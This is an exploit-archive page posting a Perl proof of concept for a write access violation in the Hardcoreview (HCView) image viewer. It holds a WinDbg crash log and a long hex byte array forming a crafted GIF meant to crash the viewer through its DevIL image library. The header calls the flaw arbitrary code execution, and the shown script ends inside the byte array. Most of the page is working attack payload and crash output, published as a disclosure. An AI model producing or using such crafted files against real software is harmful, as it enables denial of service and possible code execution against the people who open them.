exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HCView WriteAV Crash Proof Of Concept

HCView WriteAV Crash Proof Of Concept
Posted Oct 7, 2012
Authored by Jean Pascal Pereira

HCView WriteAV crash proof of concept exploit.

tags | exploit, denial of service, proof of concept
SHA-256 | 36cf1bb86989c1940b473b410af8ac6f68d4023aeef97b972a5c25cc34856979

HCView WriteAV Crash Proof Of Concept

Change Mirror Download
#!/usr/bin/perl

# Hardcoreview WriteAV Arbitrary Code Execution

# Author: Jean Pascal Pereira <pereira@secbiz.de>

# Vendor URI: http://sourceforge.net/projects/hardcoreview/

# Vendor Description:
# Image browser. Designed and created for profesional and amature watching image files.
# All kind of image files ;) . Support *.jpg, *.gif, *.bmp, *.psd, and many more.

# Debug info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\hardcoreview\hardcoreview.exe" C:\research\hcview\crafted.gif
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path. *
# * Use .symfix to have the debugger choose a symbol path. *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is:
# ModLoad: 00400000 00443000 hardcoreview.exe
# ModLoad: 7c900000 7c9b2000 ntdll.dll
# ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
# ModLoad: 5ed00000 5edcc000 C:\WINDOWS\system32\OPENGL32.dll
# ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
# ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
# ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
# ModLoad: 68b20000 68b40000 C:\WINDOWS\system32\GLU32.dll
# ModLoad: 73760000 737ab000 C:\WINDOWS\system32\DDRAW.dll
# ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.dll
# ModLoad: 10000000 102be000 C:\Program Files\hardcoreview\DevIL.dll
# ModLoad: 7c420000 7c4a7000 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCP80.dll
# ModLoad: 78130000 781cb000 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll
# ModLoad: 00350000 00365000 C:\Program Files\hardcoreview\ILU.dll
# ModLoad: 00380000 0038f000 C:\Program Files\hardcoreview\ILUT.dll
# ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll
# ModLoad: 5d090000 5d12a000 C:\WINDOWS\system32\COMCTL32.dll
# ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 003a0000 003b5000 C:\Program Files\hardcoreview\pthreadVC2.dll
# ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\WSOCK32.dll
# ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
# ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 78480000 7850e000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCP90.dll
# ModLoad: 78520000 785c3000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCR90.dll
# (e4c.8c8): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll
# ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
# ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 61dd0000 61dd6000 C:\WINDOWS\system32\MCD32.DLL
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 01620000 0171d000 C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 01720000 01769000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# (e4c.8c8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0151adc0 ebx=01510178 ecx=0151edf0 edx=d9f3d1b1 esi=0151adb8 edi=01510000
# eip=7c9108f3 esp=0012fb00 ebp=0012fbbc iopl=0 nv up ei ng nz ac pe cy
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
# ntdll!wcsncpy+0x374:
# 7c9108f3 8902 mov dword ptr [edx],eax ds:0023:d9f3d1b1=????????
# 0:000> g;r;!exploitable -v;q
# (e4c.8c8): Access violation - code c0000005 (!!! second chance !!!)
# eax=0151adc0 ebx=01510178 ecx=0151edf0 edx=d9f3d1b1 esi=0151adb8 edi=01510000
# eip=7c9108f3 esp=0012fb00 ebp=0012fbbc iopl=0 nv up ei ng nz ac pe cy
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000297
# ntdll!wcsncpy+0x374:
# 7c9108f3 8902 mov dword ptr [edx],eax ds:0023:d9f3d1b1=????????
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll -
# *** WARNING: Unable to verify checksum for C:\Program Files\hardcoreview\DevIL.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\hardcoreview\DevIL.dll -
# *** ERROR: Module load completed but symbols could not be loaded for hardcoreview.exe
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
# Exception Faulting Address: 0xffffffffd9f3d1b1
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Write Access Violation

# Exception Hash (Major/Minor): 0x69293f33.0x12365f02

# Stack Trace:
# ntdll!wcsncpy+0x374
# MSVCR80!free+0xcd
# DevIL!icalloc+0x49
# DevIL!ilDxtcDataToImage+0x2e7f
# DevIL!ilDxtcDataToImage+0x308c
# DevIL!ilDxtcDataToImage+0x30e4
# hardcoreview+0x41ba
# kernel32!RegisterWaitForInputIdle+0x49
# Instruction Address: 0x000000007c9108f3

# Proof of Concept:

my $crafted =

"\x47\x49\x46\x38\x39\x61\x32\x00\x32\x00\xF7\x00\x00\x00\x00\x00".
"\xFF\xFF\xFF\xE0\x29\x3F\x6F\x2D\x30\xB9\x78\x7A\xD9\x45\x4C\xA4".
"\x82\x84\xE6\x26\x35\xE8\x27\x39\xE6\x29\x3A\xD3\x2C\x3B\xDD\x30".
"\x40\xDE\x34\x43\x6A\x1C\x23\x5B\x19\x1F\xE6\x27\x3B\xE6\x29\x3D".
"\xE2\x28\x3D\xE8\x2A\x3E\xE6\x2A\x40\xE1\x29\x3D\xE0\x29\x3B\xEE".
"\x2C\x40\xE4\x2A\x3F\xE2\x2A\x3F\xDF\x29\x3D\xEA\x2C\x42\xE0\x2A".
"\x3F\xE0\x2A\x3D\xDF\x2A\x3D\xDF\x2A\x3F\xDE\x2A\x3B\xD9\x29\x3A".
"\xE5\x2C\x41\xE4\x2D\x3F\xDC\x2B\x3F\xDB\x2C\x3E\xE2\x2E\x42\xDD".
"\x2D\x3E\x7A\x1C\x27\x2D\x0F\x12\x2A\x16\x18\xE1\x21\x3B\xE3\x23".
"\x3D\xE3\x25\x3D\xE6\x26\x3E\xE5\x26\x40\xDE\x25\x3B\xE3\x27\x3F".
"\xED\x29\x42\xE2\x27\x3D\xE1\x27\x3D\xED\x2A\x45\xE2\x28\x3E\xE1".
"\x28\x3F\xD7\x26\x3B\xE9\x2A\x41\xE2\x29\x40\xE1\x29\x3F\xE0\x29".
"\x40\xE8\x2B\x44\xDF\x29\x40\xDF\x29\x3F\xDD\x29\x40\xD4\x27\x3F".
"\xE3\x2B\x43\xE0\x2A\x40\xDA\x29\x3F\xE9\x2D\x47\xE3\x2C\x45\xE6".
"\x2D\x45\xDF\x2C\x44\xDB\x2B\x40\xC9\x28\x3C\xE4\x2F\x48\xDC\x2D".
"\x44\xD2\x2C\x43\xC6\x2B\x3F\xAA\x27\x39\x2C\x0A\x0E\x8F\x21\x2E".
"\x91\x2B\x38\x4A\x1B\x21\xE9\x26\x42\xE1\x27\x42\xEC\x2A\x47\xDF".
"\x28\x42\xDC\x2F\x49\xD0\x30\x49\xD0\x31\x4A\xED\xA9\xB3\xCC\x31".
"\x4D\xC8\x34\x4F\xC7\x34\x4F\x8D\x71\x76\xC9\x32\x4F\xCF\x35\x53".
"\xC7\x34\x51\xC2\x37\x53\x3B\x19\x20\xBB\x3A\x57\x2B\x20\x23\xAF".
"\x40\x60\x14\x0E\x10\xC6\x95\xA6\x24\x1C\x1F\x22\x14\x1A\x18\x11".
"\x14\x88\x41\x63\xBF\x96\xAC\x1F\x1A\x1D\x0D\x04\x0C\x1A\x16\x1A".
"\x17\x15\x18\x8B\x81\x90\x25\x23\x27\x1B\x19\x22\x0F\x0E\x17\x7F".
"\x7C\x9B\x88\x8E\xBE\x73\x82\xBD\x4C\x55\x79\x91\xA6\xF3\x84\x95".
"\xCB\x63\x74\x9F\xD1\xDB\xF4\xBB\xC0\xCC\x53\x64\x8B\x8D\xA9\xE9".
"\x37\x4A\x71\x8D\xAE\xF4\x86\xA3\xDE\xD6\xE3\xFE\x93\xB6\xF6\x8B".
"\xB3\xF5\x8B\xAF\xEC\x23\x31\x46\x11\x1C\x1E\x0F\x12\x12\x09\x14".
"\x0E\x0D\x0B\x06\x07\x06\x04\x17\x12\x0C\xD2\xAC\x87\x0D\x0C\x0B".
"\x15\x14\x13\xBE\x92\x6D\xD0\xA4\x83\xD0\xA0\x7E\x27\x1E\x18\xCA".
"\x9D\x7F\x89\x5D\x40\x95\x67\x4B\xAC\x7B\x5B\xA1\x72\x55\xB7\x86".
"\x68\xC4\x93\x74\xD1\xA5\x89\x41\x2D\x21\x8C\x64\x4E\xCE\x97\x79".
"\xBC\x8C\x71\xDB\xA4\x85\xE0\xA9\x8B\xC3\x95\x7B\xB1\x89\x72\xD2".
"\xA3\x88\xDA\xAB\x8F\xCE\xA0\x87\xBB\x92\x7A\x1A\x15\x12\x1E\x16".
"\x12\xD1\x9A\x7F\x9A\x74\x61\xD8\xA4\x8A\xC7\x98\x7F\x53\x3F\x35".
"\xD8\xA6\x8D\x9B\x7F\x71\xC1\xA3\x94\x4E\x33\x26\x6D\x49\x39\x7C".
"\x53\x41\xCC\x94\x7B\xC3\x8E\x76\xD4\x9E\x85\xE3\xAD\x94\xCC\x9B".
"\x85\xC2\x99\x85\xCA\xA0\x8D\xD5\xA9\x95\xC3\x9E\x8D\xB5\x94\x85".
"\xEB\xD8\xCF\x24\x15\x0F\xC1\x86\x6E\xB4\x7D\x67\xCD\x90\x77\xA6".
"\x76\x63\xD8\x9C\x83\xDC\xA2\x8A\xD7\xA0\x88\xAA\x7E\x6B\xD5\xA2".
"\x8E\xD3\xA1\x8D\xDA\xA9\x94\xE3\xB1\x9C\xDE\xAC\x98\xBE\x93\x82".
"\xE6\xB6\xA3\xBF\x98\x88\xCE\x95\x81\xC6\x94\x81\xDB\xA5\x91\xD4".
"\xA5\x94\xB1\x8B\x7D\xA9\x85\x77\xE0\xB7\xA7\x60\x40\x36\xBB\x83".
"\x70\xD4\x9D\x8A\xB2\x83\x74\x90\x6B\x5F\xB9\x8B\x7C\x6D\x53\x4A".
"\x35\x21\x1B\xC3\x9E\x94\x7F\x61\x59\xA3\x80\x77\xD2\xA9\x9F\xCA".
"\xA3\x99\x23\x15\x12\x1E\x19\x18\xDE\xCA\xC6\x30\x15\x10\x16\x0A".
"\x08\xDC\x8E\x80\x39\x27\x24\xD2\x79\x6B\xDC\x85\x77\x19\x12\x11".
"\xD3\xA0\x98\x2F\x1D\x1B\xED\xBC\xB6\xAB\x4F\x47\x24\x18\x17\xBB".
"\x95\x92\xAD\x6E\x6A\xD9\x5C\x5C\xB7\x6A\x69\x1E\x16\x16\x19\x15".
"\x15\x2E\x28\x28\x08\x07\x07\xA8\xA5\xA5\xFF\xFF\xFF\x21\xF9\x04".
"\x01\x00\x00\xFF\x00\x2C\x00\x4B\x00\x00\x32\x00\x32\x00\x00\x08".
"\xFF\x00\x03\x08\x1C\x48\xB0\xA0\xC1\x83\x08\x13\x2A\x5C\xC8\xB0".
"\x21\x43\x32\x5F\xB8\x48\x9C\x38\xF1\xCB\x97\x2E\x5F\xB6\x5C\x0C".
"\xC3\x65\x8B\x46\x8B\x5D\x30\x5A\x1C\x79\xB1\x0B\x45\x89\x5B\xCC".
"\x18\x64\x22\xA0\xA5\xCB\x97\x02\x32\x64\x40\x82\x84\x4A\x8E\x0A".
"\x0F\x20\x98\x88\x00\xA1\xC3\x87\x08\x35\x90\x8C\xF0\x30\xD4\x86".
"\x0D\x1D\x30\x5B\x86\x31\x88\x25\xE9\x4B\x0F\x1E\x5C\xB4\xB0\xD1".
"\xC3\x46\x08\x1E\x41\x96\x14\x31\x42\x84\xC6\x04\x0A\x32\x6A\xF8".
"\xF0\x31\x62\x04\x0C\xA4\x49\xC5\x30\x75\xDA\x52\x47\x8F\x1F\x3A".
"\x28\x54\x90\x40\xC4\x49\x03\x07\x78\x1B\x9C\x70\xC2\x84\xC8\x04".
"\x19\x30\x5C\x10\x15\x80\x16\xA6\xDA\x82\x4D\xD9\xFA\x80\x61\x63".
"\x04\x8F\x2A\x4D\x4E\x3C\x61\x04\x69\x1D\x24\x46\xEB\xD6\xA9\x6B".
"\xD0\x44\x49\x88\x16\x35\x46\xD8\xA8\xE1\xF4\x30\xC1\xC4\x30\x75".
"\x78\x88\x09\xA1\xAE\x03\x14\xEB\x1C\xC5\x39\xB3\x46\x55\xA4\x35".
"\x91\x16\x31\x42\x71\x82\x49\x15\x18\x19\x60\x90\x4E\xBB\xD6\x65".
"\x0D\x0A\x3F\x6A\x74\xE8\x30\xC5\xC8\x09\x47\x67\xCE\x38\x82\x87".
"\x1B\x9E\xA3\x48\x71\xE2\xA8\x82\xA7\x08\xD2\x18\x27\x26\x12\xF4".
"\xFF\xE8\x51\xDA\x60\x96\x97\x14\x32\xEC\xD0\x21\x03\xC7\x95\x06".
"\x8C\x1A\xAD\x93\xE7\x49\x9E\x3E\x7D\xB6\x23\x4D\x57\xC5\x3F\xB7".
"\x23\x28\x55\x50\x40\x42\x79\x05\x9D\xE7\x92\x07\x1D\xC0\x20\x00".
"\x0C\x55\x34\x00\xC9\x1B\xEB\xD0\x52\x4B\x2D\x9E\x08\xB3\xCA\x2A".
"\xF0\xC0\xA3\xCA\x3E\x91\xC0\x73\x1F\x3A\xF7\x39\x61\xC1\x07\x04".
"\x12\x64\xA0\x4B\x3E\x78\x10\x01\x11\x50\xAC\xD3\xCF\x3A\xB6\x60".
"\x72\xC9\x25\xDA\x78\x62\x63\x38\xF5\xEC\x93\x1D\x3C\xE7\x54\xB2".
"\x8A\x1A\x89\x84\xD3\x84\x04\x25\x0E\x74\xA2\x00\x36\x08\x30\xC2".
"\x04\x4D\x08\x53\x59\x2D\x99\x64\xA2\x89\x26\x98\xD8\x52\x8B\x95".
"\xB4\xE0\xB8\x8F\x3E\xAB\xB4\xD3\xCE\x2A\x71\xB8\x31\x40\x10\x17".
"\x10\x57\xE0\x53\x61\x39\xC7\xC8\x1B\xB4\x44\x99\x09\x31\x6E\xCE".
"\xA8\xC9\x27\x14\xD6\x83\x4E\x19\xE1\xD4\x08\x0F\x1D\xFC\x38\xA1".
"\x81\x07\x49\xDA\xB0\x9A\x69\x46\xC2\x44\x81\x08\x49\xA8\x03\x89".
"\x30\x9F\x6C\xB2\xC9\x30\x8E\x46\xAA\x89\xA3\x99\x5C\x42\x4B\x3D".
"\x5E\x6A\xF3\x49\x38\x6E\xCC\x31\x40\x09\x1F\x50\xC1\x41\x0D\x83".
"\x9A\x07\x13\x06\x46\xB4\x08\x49\x3B\xCA\x84\xE2\x2A\x27\x9C\x0C".
"\xFF\x23\x09\x2E\xA1\xE0\x72\x0B\x29\xA1\x7C\x42\x0B\x3F\xB0\xD0".
"\xD2\x4A\x2D\x70\xCC\xD1\x4E\x12\x13\x58\xD1\x41\x0D\x3B\x08\x40".
"\xA8\x40\x47\xDA\x20\xC4\x11\x0E\x28\x72\x06\x2D\xDD\xE0\x82\x0B".
"\x29\x9C\x14\xA3\xED\x2D\xAC\xB0\x02\x0A\x28\xD6\x62\xE2\x09\x2C".
"\xDA\xD8\x02\x4E\x24\x73\xCC\x11\x05\x0D\x54\xA4\x47\xDE\xB2\x01".
"\x1C\xA9\x03\x06\x40\x84\x03\xC7\xB4\xA5\xA4\xF2\x0A\x35\xDC\xDE".
"\x72\xCB\x34\xB9\xE4\xC2\xCA\xBE\xB7\xE0\xF2\x09\x2C\x9F\xD8\x02".
"\x8B\x23\x9D\x0E\xC0\xC3\x14\x15\xA4\xA8\xAC\xA9\x2F\x5D\xC0\x44".
"\x3B\x74\x44\x02\x4B\x2A\xA9\x28\x83\x8D\x34\xD6\x54\xB3\x4C\x32".
"\xDC\x30\xB3\x0C\x37\xC9\x30\xD3\x0B\x34\xDE\x68\x92\x89\x36\xF0".
"\x34\x1C\x83\x10\x1F\xB8\x90\x2C\xBC\x47\x66\x00\x41\x12\xED\xA4".
"\x01\x0F\x38\xD3\xB4\x02\x0E\x38\xE3\xC8\xC2\xCB\x32\xCF\x3C\xD3".
"\x4C\x33\xCF\x58\x03\x8C\x2C\xB2\x78\x63\x8C\x24\xB6\xC0\x91\x86".
"\xBA\x31\x90\x40\x82\x0B\x0A\xE2\xFC\xD2\x0E\x13\x28\x30\x46\x1A".
"\x8E\xD8\x82\x4B\x2B\xE4\x78\x31\xCE\x38\xAD\xA4\xC2\x4D\x35\xD5".
"\xC4\xB2\x8B\x2C\xE3\x0C\xCD\x36\xD5\xAA\xA4\xE1\x46\x14\x25\x3C".
"\xFF\x30\x02\x92\x13\x9F\xE9\x92\x0D\x13\x30\x31\x06\x1D\xF0\x8C".
"\xC3\x8B\x34\xE6\xF4\xE2\x38\x34\xAF\xB0\x72\x4C\x32\xB9\x50\x93".
"\x2F\x35\xD0\x5C\x93\x0A\x27\xB6\xC4\x8C\x4E\x14\x46\xB4\x30\x42".
"\x07\x2D\x79\x6D\x1C\x04\x4D\x8C\x71\x5F\x2D\xDB\x7C\x73\x0D\x39".
"\xE3\x78\xF3\xCD\x37\xD0\xA0\x22\xB2\x24\xDF\x60\x23\xCB\x35\xC0".
"\xA4\x62\x89\x2D\x6B\xAC\xB1\x0F\xE8\x36\x73\x50\x3A\xC5\x2D\xD5".
"\xB0\xF3\x00\xE0\x9C\x63\xCB\x27\xDE\x18\xE0\x0D\x38\xDA\x90\x63".
"\x0F\x30\xAD\x74\x83\x0D\x39\xDD\xD4\x02\x8B\x17\x6D\x5C\xE3\x8D".
"\x36\x95\xA8\xB3\x8A\x13\x25\xCC\x60\x43\x04\x14\x04\x6E\x22\x4C".
"\x39\x80\x40\x8F\x31\x29\xB4\xE2\x8B\x39\xE6\x88\x23\xCD\x37\xDD".
"\x5C\x83\x0D\x26\x92\x88\x9E\x31\xD0\x66\x0F\x34\x48\x23\x15\x07".
"\xC3\x04\x2D\x92\x50\x01\x01\x58\xE1\x38\xEE\x2B\xD4\x4B\x7A\x50".
"\x01\x7A\x0C\x43\x1B\xC6\x70\x45\x3C\xCA\xE1\x8C\x66\xEC\xE2\x16".
"\xDF\x68\x45\x28\x46\xA1\x0C\x65\x94\x82\x1A\xB1\x70\x45\x33\xAA".
"\x71\x8A\x97\x19\x83\x1E\x37\x80\x40\x0D\x7A\x40\xBA\x08\x32\xEB".
"\x25\x46\xA1\x40\x01\x8A\x51\x0B\x65\xB8\xC2\x17\xD9\xC8\x86\x35".
"\xFF\x76\x81\x0A\x54\xBC\x22\x16\xBA\xA0\x04\x35\x48\x91\x8A\x5D".
"\xC4\xC2\x19\xB1\x10\x05\x31\x6A\xA1\x89\x02\x0C\xC1\x06\x67\x19".
"\x8B\x0D\xE3\x85\xC3\x1C\xCC\x80\x01\xEE\xB0\x05\x31\x62\x11\x8D".
"\x79\x64\xA3\x19\xB1\x48\xDA\x32\x9A\xA1\x0B\x64\x98\x62\x19\xBB".
"\x60\xC6\x33\xA2\xA1\x0B\x51\x18\xC3\x16\xEE\x30\x01\x16\x73\xB0".
"\xA0\x24\x99\xCE\x25\x23\x68\xC1\x0B\xF0\x41\x8A\x61\x2C\xC3\x19".
"\x41\x74\x86\x2E\xAA\xC1\x0D\x6E\xB0\x11\x19\xAC\x70\xE4\x1C\xA3".
"\x31\x0A\x29\x0E\x03\x1F\x2A\x70\x01\x06\xA0\xC2\x98\x2D\x1E\x89".
"\x28\x30\x78\x41\x01\x90\x71\x8B\x5D\x4C\xD2\x19\xC9\xD8\x06\x37".
"\x9C\x11\x8D\x56\x22\x63\x1B\xD3\x78\x86\x33\x9C\x31\x0A\x50\x14".
"\xE3\x1D\x26\x50\x41\x92\xCA\x72\x14\x4F\xBE\x24\x03\x11\xD8\xC1".
"\x0F\x66\xF0\x8E\x5D\xB0\x82\x69\x8A\x2C\x06\x2C\x09\xB0\x0B\x6E".
"\xE0\x62\x1A\xD3\xD8\x46\x35\x74\x31\x0A\x57\x80\x82\x12\xF8\x78".
"\x81\x07\x74\xD0\xC9\x1A\x20\xE5\x8F\x48\x52\xD0\x0E\x06\xC9\x0E".
"\x56\x24\x03\x19\xA7\x38\x86\xC9\xBA\x61\x0C\xDA\x29\xE3\x1B\xCD".
"\x00\x98\x28\x8E\x91\x0B\x50\x88\x02\x93\x1B\x10\x40\x0D\x6A\x60".
"\xFF\x94\xE3\x09\xAE\x2D\x8D\xD1\x41\x0D\x6E\x80\x8F\x5D\xE4\xE2".
"\x18\xA6\xD8\x45\xFE\xEC\x21\x0E\xFC\xE9\xEF\x17\xBB\x20\x85\xB7".
"\x28\x51\x0C\x7C\x84\xC0\x07\x6C\x01\x67\x4B\xFE\xE6\x02\x15\x14".
"\x80\x15\x93\x98\x04\x2A\xA4\xF1\x8B\x59\x94\x23\x1E\x28\x2D\x87".
"\x39\x7E\xC1\x0B\x89\x52\x62\x12\xEF\xF8\xC0\x0B\x46\xC0\x47\x33".
